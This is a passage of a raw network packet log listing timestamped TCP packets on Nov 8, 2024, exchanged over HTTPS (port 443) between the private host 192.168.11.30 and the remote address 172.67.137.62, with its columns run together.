                                                                                                                          Nov 8, 2024 10:58:42.550374985 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.550539017 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.550546885 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.550720930 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.550721884 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.550913095 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.550913095 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.551107883 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.551107883 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.551114082 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.551151991 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.551336050 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.551528931 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.551893950 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.551913023 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.552150011 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.552333117 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.552339077 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.552511930 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.552511930 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.552752018 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.552752018 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.554531097 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.554550886 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.554956913 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.554956913 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.554965019 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.555136919 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.555316925 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.556328058 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.556346893 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.556602001 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.556782007 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.556782007 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.556787968 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.556961060 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.557152033 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.558008909 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.558028936 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.558268070 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.558448076 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.558448076 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.558454990 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.558626890 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.558675051 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.560461998 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.560482025 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.560710907 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.561069965 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.561075926 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.561359882 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.561475039 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.561630011 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.561903000 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.561908007 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.562288046 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.563725948 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.776392937 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.776411057 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.776555061 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.776777029 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.776787043 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.777156115 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.778320074 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.778332949 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.778479099 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.778711081 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.778717995 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.779093981 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.780242920 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.780256033 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.780539036 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.780719042 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.780719042 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.780729055 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.781085014 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.781086922 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.781095982 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.781493902 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.781534910 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.783164978 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.783175945 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.783407927 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.783587933 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.783587933 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.783592939 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.783816099 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.785293102 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.785310030 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.785682917 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.785682917 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.785692930 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.785876036 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.798326969 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.798341036 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.798444033 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.798700094 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.798711061 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.798893929 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.798893929 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.798901081 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.799063921 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.799109936 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.799113989 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.799302101 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.799309015 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.799534082 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.799628019 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.799819946 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.800061941 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.800071001 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.800255060 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.800560951 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.801480055 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.801491976 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.801724911 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.801904917 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.801908970 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.802109003 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.802325964 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.803332090 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.803344011 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.803714991 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.803715944 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.803725958 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.803894997 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.803894997 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.804102898 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.805260897 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.805274963 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.805679083 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.805856943 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.805867910 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.806227922 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.807579041 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.807591915 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.808024883 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.808024883 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.808037996 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.808203936 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.808507919 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.808548927 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.808808088 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.808975935 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.808983088 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:42.809353113 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:42.862369061 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.023847103 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.023997068 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.024194002 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.024266958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.024280071 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.024290085 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.024446964 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.024458885 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.024626970 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.024637938 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.024820089 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.025011063 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.025202990 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.025892973 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.025904894 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.026236057 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.026236057 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.026400089 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.026400089 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.026411057 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.026772022 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.028105974 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.028115988 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.028307915 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.028487921 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.028498888 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.028724909 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.030029058 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.030039072 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.030411005 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.030411005 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.030424118 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.030797958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.031910896 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.031920910 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.032063961 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.032298088 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.032309055 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.032346964 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.032531023 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.033296108 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.033749104 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.033759117 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.033912897 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.034090042 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.034097910 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.034383059 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.041377068 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.041388988 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.041430950 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.041630983 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.041810989 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.041810989 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.041822910 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.041990995 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.041990995 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.042232037 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.042232037 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.042423010 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.042614937 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.049041033 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.049051046 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.049097061 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.049209118 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.049609900 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.049609900 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.049621105 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.049802065 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.049992085 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.050019026 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.050029039 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.050184965 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.050606966 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.050616980 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.052180052 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.052191019 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.052386999 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.052397013 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.052474022 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.052670002 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.054063082 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.054071903 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.054248095 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.054259062 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.054414034 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.054625988 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.056063890 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.056073904 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.056246996 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.056421995 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.056427956 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.057847023 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.057858944 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.058171988 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.058171988 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.058178902 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.058362961 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.058563948 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.058636904 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.058904886 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.064614058 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.274432898 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.274447918 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.274584055 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.274682999 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.274863005 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.274863005 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.274868965 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.275042057 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.275042057 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.275090933 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.275283098 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.276077032 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.276089907 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.276151896 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.276222944 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.276496887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.276496887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.276501894 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.276676893 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.276855946 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.276855946 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.277048111 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.277050972 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.277288914 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.277483940 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.277503014 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.277518988 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.277947903 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.277955055 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.278381109 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.279813051 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.279824972 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.279963970 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.280158997 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.280164003 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.280340910 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.282023907 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.282036066 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.282212973 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.282217979 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.282300949 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.282485008 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.283752918 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.283766031 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.284135103 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.284135103 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.284142017 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.284516096 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.285552025 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.285563946 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.285929918 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.285929918 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.285936117 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.286313057 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.294209957 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.297426939 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.297441006 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.297610998 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.297693014 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.297780991 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:43.297868013 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.297868013 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.297868013 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:43.297874928 CET44349747172.67.137.62192.168.11.30
